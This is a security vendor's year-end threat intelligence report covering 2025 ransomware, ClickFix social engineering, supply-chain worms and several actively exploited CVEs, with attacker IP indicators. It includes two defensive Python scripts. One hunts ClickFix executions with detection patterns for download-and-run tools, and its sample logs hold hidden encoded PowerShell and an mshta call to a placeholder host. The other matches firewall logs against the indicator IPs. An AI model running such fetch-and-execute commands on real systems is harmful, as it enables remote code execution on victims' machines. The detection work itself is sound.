
Cyber Threat Intelligence Report | 12/29/2025 | PacketWatch

Written by The PacketWatch Intelligence Team | December 29, 2025

 

This week, we reviewed 2025 statistics with our clients, including ransomware, ClickFix, software vulnerabilities, supply chain compromises, and AI usage.


 

 KEY TAKEAWAYS 

  • Review the top cyber threats from 2025, and what to expect in 2026.

  • Critical and high-severity vulnerabilities in Cisco, MongoDB, WatchGuard, and HPE, plus new additions to the CISA KEV catalog. Patch now!



 

2025 - A Year in Review

2025 was an interesting year in cybersecurity. It saw the continuation of earlier trends, such as double-extortion ransomware and thousands of software vulnerabilities; the growth of others, such as AI usage and supply chain attacks; and the arrival of new ones, such as the social engineering tactic known as ClickFix. This article covers notable examples of each, as well as what to expect in 2026.

 

Ransomware Continues to Thrive

While the total amount of ransomware payouts has actually declined in recent years, the impact on businesses across the globe has continued to increase. Per Check Point's State of Ransomware Q3 2025, claimed ransomware victims rose roughly 25% year-over-year. Based on its analysis of monitored data leak sites, ransomware groups are posting an average of 520 to 540 victims per month.

Ransomware is a global issue, but over half of the known ransomware victims were in the United States. Victims were also relatively evenly distributed across industry verticals. Sadly, healthcare and education remain common targets of ransomware.

According to DeepStrike's Ransomware Statistics 2025, the most common initial access method for ransomware groups was RDP or VPN compromise via stolen or brute-forced credentials, accounting for roughly 50% of ransomware intrusions. This high number is due to the prevalence of credentials stolen by infostealer malware, as well as poorly secured remote access endpoints (weak passwords, no MFA). Vulnerable software accounted for over 30% of intrusions. Vulnerabilities in edge devices, such as firewalls, SSL VPN appliances, and file share servers, can quickly become an open door for initial access brokers. The remaining 20% of intrusions resulted from social engineering attacks such as fake IT support emails and phone calls, or ClickFix watering hole attacks.

 

ClickFix

The social engineering technique known as ClickFix (aka FakeCaptcha) was widely adopted by threat actors in 2025. It has quickly become one of the most popular ways for threat actors to either gain initial access to an environment or deploy infostealer malware. The attack occurs when a user either visits a compromised site (drive-by attack) or is tricked into visiting an attacker-controlled site via phishing or SEO abuse. The victim is then presented with a prompt similar to this:

 

Fig 1: Fake CAPTCHA Example | Source: Elastic Security

 

If the victim follows the steps shown, they open the Run dialog box (often the prompt directs them to PowerShell or CMD instead), paste in the malicious code, and then execute it. In effect, the target runs the malicious code on the threat actor's behalf. In most cases, this initial code downloads and executes a malicious file, establishing a foothold on that endpoint.

Other variants of this technique, including FileFix and ConsentFix, have emerged in recent months. Although the presentation differs, the net effect is the same: users are tricked into running malicious code on their systems, giving threat actors initial access.
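The sequence described above leaves a recognisable footprint in endpoint telemetry: the Run dialog launches its target as a child of explorer.exe, so a shell or script host spawned by explorer.exe with a command line that hides its window, carries an encoded command, or fetches something from a URL is what a hunter looks for. The script below is an added example written for this report, not PacketWatch's own tooling. It scores process-creation records against those features; the log lines are constructed samples in an assumed, simplified Sysmon Event ID 1 "Key=value|Key=value" layout, and the indicator weights and threshold are assumptions to tune against your own baseline.

```python
"""Hunting for ClickFix-style executions in process-creation telemetry.

Added example (not PacketWatch's code). Telemetry layout, indicator weights and
threshold are assumptions for illustration; adapt parse_event() to your schema.
"""
import re
from typing import Dict, List, Tuple

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe"}
RUN_DIALOG_PARENTS = {"explorer.exe"}  # Win+R / Run dialog children land here

# (name, regex, weight). Weights and THRESHOLD are assumptions, not report values.
INDICATORS: List[Tuple[str, str, int]] = [
    ("encoded_command", r"(?i)\s-(e|ec|enc|encodedcommand)\s", 3),
    ("hidden_window", r"(?i)-w(indowstyle)?\s+hidden", 2),
    ("invoke_expression", r"(?i)\b(iex|invoke-expression)\b", 2),
    ("remote_fetch",
     r"(?i)(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|bitsadmin)", 2),
    ("mshta_remote", r"(?i)mshta(\.exe)?\s+https?://", 3),
    ("url_present", r"(?i)https?://", 1),
]
THRESHOLD = 4


def parse_event(line: str) -> Dict[str, str]:
    """Split the constructed 'Key=value|Key=value' layout into a dict."""
    fields: Dict[str, str] = {}
    for chunk in line.split("|"):
        if "=" in chunk:
            key, value = chunk.split("=", 1)
            fields[key.strip()] = value.strip()
    return fields


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: Dict[str, str]) -> Tuple[int, List[str]]:
    """Return (score, matched indicator names) for one process-creation event."""
    if _basename(event.get("ParentImage", "")) not in RUN_DIALOG_PARENTS:
        return 0, []
    if _basename(event.get("Image", "")) not in SCRIPT_HOSTS:
        return 0, []
    cmdline = event.get("CommandLine", "")
    hits = [name for name, pattern, _ in INDICATORS if re.search(pattern, cmdline)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    return score, hits


def find_clickfix(lines: List[str], threshold: int = THRESHOLD) -> List[Dict[str, object]]:
    """Return the events scoring at or above the threshold, in log order."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        event = parse_event(line)
        score, hits = score_event(event)
        if score >= threshold:
            findings.append({"time": event.get("UtcTime"), "host": event.get("Computer"),
                             "score": score, "hits": hits,
                             "cmdline": event.get("CommandLine")})
    return findings


# Constructed sample telemetry (not real incident data). The base64 blob is a
# placeholder (the alphabet A-Z), not a payload.
SAMPLE_EVENTS = [
    "UtcTime=2025-12-22 14:03:11|Computer=WS-0412|ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell -w hidden -enc QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=",
    "UtcTime=2025-12-22 14:05:40|Computer=WS-0412|ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\mshta.exe"
    "|CommandLine=mshta https://verify.example.invalid/captcha",
    "UtcTime=2025-12-22 14:06:02|Computer=WS-0412|ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\notepad.exe|CommandLine=notepad.exe notes.txt",
    "UtcTime=2025-12-22 14:07:15|Computer=WS-0412|ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\cmd.exe|CommandLine=cmd /c echo hello",
    "UtcTime=2025-12-22 14:09:58|Computer=WS-0412|ParentImage=C:\\Windows\\System32\\services.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell -NoProfile -Command Get-Date",
]

if __name__ == "__main__":
    for finding in find_clickfix(SAMPLE_EVENTS):
        print(finding)
```

On the constructed sample the first two events (hidden-window encoded PowerShell and mshta pulling a remote URL, both under explorer.exe) are flagged; the benign explorer.exe children and the PowerShell launched by services.exe are not. The parent filter is deliberately narrow, so a FileFix-style variant launched from a browser or the File Explorer address bar needs its own parent entry; correlating hits with the HKCU RunMRU registry values Windows keeps for the Run dialog raises confidence further.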

 

Vulnerabilities Everywhere

As previously mentioned, software vulnerabilities accounted for over 30% of ransomware intrusions in 2025. Ironically, many devices that are intended to secure a network can be a company's biggest security liability. Unpatched edge devices that are vulnerable to remote code execution or authentication bypass are continuously targeted by initial access brokers. Once compromised, this access is sold to the highest bidder on the dark web (typically ransomware groups). Threat actors are becoming more efficient at weaponizing newly disclosed vulnerabilities, with mass exploitation commonly beginning 24 to 48 hours after disclosure.

 

Supply Chain Compromises

Supply chain compromises are nothing new (see SolarWinds). However, 2025 saw an increase in supply chain attacks on code repositories. In September 2025, npm maintainers were phished, and attackers created a self-replicating worm known as "Shai-Hulud" that compromised at least 477 packages within 72 hours. Two months later, attackers launched Shai-Hulud 2.0, with even more advanced automation and replication, which impacted popular projects such as Zapier, PostHog, and Postman.

 

AI Usage

AI presents an interesting threat landscape for organizations. First, there is the data privacy threat: users are adopting AI tools more and more, and organizations are struggling to identify this usage, what data is being sent to AI servers, and where that data is stored. Simultaneously, threat actors are leveraging AI tools to create more realistic phishing lures, speed up development of malicious tooling, and even automate certain parts of an intrusion. While AI has yet to produce anything truly novel from a hacking and intrusion perspective, it has certainly lowered the barrier to entry for cybercriminals.

 

Looking Ahead to 2026

In 2026, we will continue to see what we encountered this year, just more of it. Ransomware will remain an ever-present threat for all organizations. Threat actors will continue to be creative with their social engineering lures, especially with the assistance of AI tools. Critical vulnerabilities in edge devices will continue to be a pain point for organizations, leading to ransomware and data breaches. Given the success of supply chain attacks like Shai-Hulud, threat actors will step up their attempts to compromise code repositories.

What does this all mean for organizations moving forward? These security challenges are not going away, and organizations need to remain vigilant at all times. The good news is that all of these threats can be countered with good cybersecurity hygiene. Organizations should review fundamentals like password policies, MFA implementation, network segmentation, EDR deployment and policies, user account privileges, network monitoring and logging, and patch management. Strong fundamentals position an organization to prevent and detect these threats before a substantial impact occurs.

 

 

Vulnerability Roundup

 

Maximum-Severity Flaw in Cisco AsyncOS Actively Exploited

Cisco recently disclosed a maximum-severity flaw in Cisco Secure Email Gateway and Cisco Secure Email and Web Manager running Cisco AsyncOS Software that is under active exploitation. Tracked as CVE-2025-20393, the vulnerability allows threat actors to execute arbitrary commands with root privileges on the system. Systems are vulnerable when both of the following conditions are met: the appliance is configured with the Spam Quarantine feature, and the Spam Quarantine feature is exposed to the internet. Administrators are urged to implement the detailed system hardening recommendations provided by Cisco.

Per the threat report from Talos Intelligence, the exploitation has been attributed to a China-nexus APT group tracked as UAT-9686. Talos provided the following IP addresses as indicators of compromise:

*.ip:(172.233.67.176 OR 172.237.29.147 OR 38.54.56.95)

 

High-severity Flaw in MongoDB

MongoDB recently issued a security bulletin addressing a high-severity vulnerability that can allow unauthenticated threat actors to read memory or potentially gain remote code execution. The vulnerability is tracked as CVE-2025-14847. The following MongoDB versions are vulnerable:

  • MongoDB 8.2.0 through 8.2.3
  • MongoDB 8.0.0 through 8.0.16
  • MongoDB 7.0.0 through 7.0.26
  • MongoDB 6.0.0 through 6.0.26
  • MongoDB 5.0.0 through 5.0.31
  • MongoDB 4.4.0 through 4.4.29
  • All MongoDB Server v4.2 versions
  • All MongoDB Server v4.0 versions
  • All MongoDB Server v3.6 versions

Administrators are strongly urged to upgrade to MongoDB 8.2.3, 8.0.17, 7.0.28, 6.0.27, 5.0.32, or 4.4.30 as soon as possible.

 

WatchGuard Firebox Critical Vulnerability Actively Exploited

WatchGuard recently disclosed a critical vulnerability in its Firebox firewalls. Tracked as CVE-2025-14733, this vulnerability allows for unauthenticated remote code execution on vulnerable systems. The flaw affects Firebox firewalls running Fireware OS 11.10.2 through 11.12.4_Update1, 12.0 through 12.11.5, and 2025.1 through 2025.1.3. WatchGuard has indicated that this vulnerability is currently being exploited in the wild. Administrators are urged to apply updates as soon as possible. Per the WatchGuard advisory, any outbound communication to the following IP addresses from a Firebox device is a strong indication of compromise:

destination.ip:(45.95.19.50 OR 51.15.17.89 OR 172.93.107.67 OR 199.247.7.82)
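The two indicator queries above (the Talos list for CVE-2025-20393 and the WatchGuard list for CVE-2025-14733) are written for a SIEM; the script below does the same matching offline against exported firewall or flow logs, so a team without that query language can still sweep. It is an added example, not PacketWatch's, Talos's or WatchGuard's code. The IP addresses are exactly those quoted in this report; the log lines are constructed samples in an assumed "key=value" syslog layout. It preserves the directional difference between the two advisories: the Talos query (`*.ip`) matches either endpoint, while the WatchGuard indicator is outbound traffic from the Firebox, so that set is checked against the destination only.

```python
"""Sweep exported firewall/flow logs for the IP indicators quoted in this report.

Added example (not PacketWatch's, Talos's or WatchGuard's code). Log layout is an
assumed 'key=value' syslog format; adjust parse_log_line() for your exporter.
"""
import ipaddress
import re
from typing import Dict, List, Optional

# Indicator sets as quoted in the Cisco/Talos and WatchGuard items above.
WATCHLISTS = {
    "UAT-9686 / CVE-2025-20393 (Talos)": {
        "ips": {"172.233.67.176", "172.237.29.147", "38.54.56.95"},
        "direction": "any",   # Talos query is *.ip: source or destination
    },
    "WatchGuard Firebox CVE-2025-14733": {
        "ips": {"45.95.19.50", "51.15.17.89", "172.93.107.67", "199.247.7.82"},
        "direction": "dst",   # advisory: outbound communication from the Firebox
    },
}

KV_RE = re.compile(r"(\w+)=(\S+)")


def parse_log_line(line: str) -> Dict[str, str]:
    """Turn 'k=v k2=v2 ...' into a dict (constructed sample layout)."""
    return {key: value for key, value in KV_RE.findall(line)}


def _norm_ip(value: Optional[str]) -> Optional[str]:
    """Canonical IP string, or None if the field is missing or malformed."""
    if not value:
        return None
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        return None


def match_line(line: str) -> Optional[Dict[str, Optional[str]]]:
    """Return the first watchlist hit for a log line, or None."""
    fields = parse_log_line(line)
    src, dst = _norm_ip(fields.get("src")), _norm_ip(fields.get("dst"))
    for advisory, watchlist in WATCHLISTS.items():
        if watchlist["direction"] == "dst":
            candidates = [("dst", dst)]
        else:
            candidates = [("src", src), ("dst", dst)]
        for role, ip in candidates:
            if ip and ip in watchlist["ips"]:
                return {"time": fields.get("ts"), "device": fields.get("dev"),
                        "advisory": advisory, "role": role, "ip": ip,
                        "src": src, "dst": dst}
    return None


def scan(lines: List[str]) -> List[Dict[str, Optional[str]]]:
    """All watchlist hits across a batch of log lines, in log order."""
    return [hit for hit in (match_line(line) for line in lines) if hit]


# Constructed sample log lines (documentation/private addresses, not real traffic).
SAMPLE_LOG_LINES = [
    "ts=2025-12-23T08:12:04Z dev=fw-edge-01 src=10.20.1.15 dst=199.247.7.82 dport=443 proto=tcp action=allow",
    "ts=2025-12-23T08:12:09Z dev=fw-edge-01 src=10.20.1.22 dst=203.0.113.10 dport=443 proto=tcp action=allow",
    "ts=2025-12-23T08:13:30Z dev=esa-01 src=38.54.56.95 dst=10.20.1.40 dport=443 proto=tcp action=allow",
    "ts=2025-12-23T08:14:01Z dev=fw-edge-01 src=51.15.17.89 dst=10.20.1.5 dport=22 proto=tcp action=deny",
    "ts=2025-12-23T08:15:55Z dev=fw-edge-01 src=10.20.1.15 dst=not-an-ip proto=tcp action=allow",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG_LINES):
        print(hit)
```

On the sample, the outbound connection to 199.247.7.82 is reported under the WatchGuard advisory and the inbound connection from 38.54.56.95 under the Talos one; the inbound attempt from 51.15.17.89 is not reported because the WatchGuard indicator is outbound only, and the malformed destination is skipped rather than crashing the sweep. Widening the WatchGuard entry to "any" is a reasonable local choice if you would rather review inbound scans from those hosts as well.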

 

Maximum-severity Flaw in HPE OneView

Hewlett Packard Enterprise (HPE) recently fixed a maximum-severity vulnerability in HPE OneView, its IT infrastructure management software. Tracked as CVE-2025-37164, successful exploitation can allow for remote code execution on the vulnerable server. The flaw affects all versions of HPE OneView prior to version 11.00. Administrators are urged to apply the update as soon as possible.

 

CISA KEV Additions

The following vulnerabilities were added to CISA's Known Exploited Vulnerabilities Catalog in the last two weeks:

  • CVE-2023-52163 - Digiever DS-2015 Pro Missing Authorization Vulnerability
  • CVE-2025-14733 - WatchGuard Firebox Out of Bounds Write Vulnerability
  • CVE-2025-20393 - Cisco Multiple Products Improper Input Validation Vulnerability
  • CVE-2025-40602 - SonicWall SMA1000 Missing Authorization Vulnerability
  • CVE-2025-59374 - ASUS Live Update Embedded Malicious Code Vulnerability
  • CVE-2025-59718 - Fortinet Multiple Products Improper Verification of Cryptographic Signature Vulnerability
  • CVE-2025-43529 - Apple Multiple Products Use-After-Free WebKit Vulnerability
  • CVE-2025-14611 - Gladinet CentreStack and Triofox Hard-Coded Cryptographic Vulnerability

 

 

 

This report is provided FREE to the cybersecurity community.

Visit our Cyber Threat Intelligence Blog for additional reports.

 


NOTE
We have enhanced our report with data from SOCRadar. You may need to register to view their threat intelligence content.

DISCLAIMER
Kindly be advised that the information contained in this article is presented with no final evaluation and should be considered raw data. The sole purpose of this information is to provide situational awareness based on the currently available knowledge. We recommend exercising caution and conducting further research as necessary before making any decisions based on this information.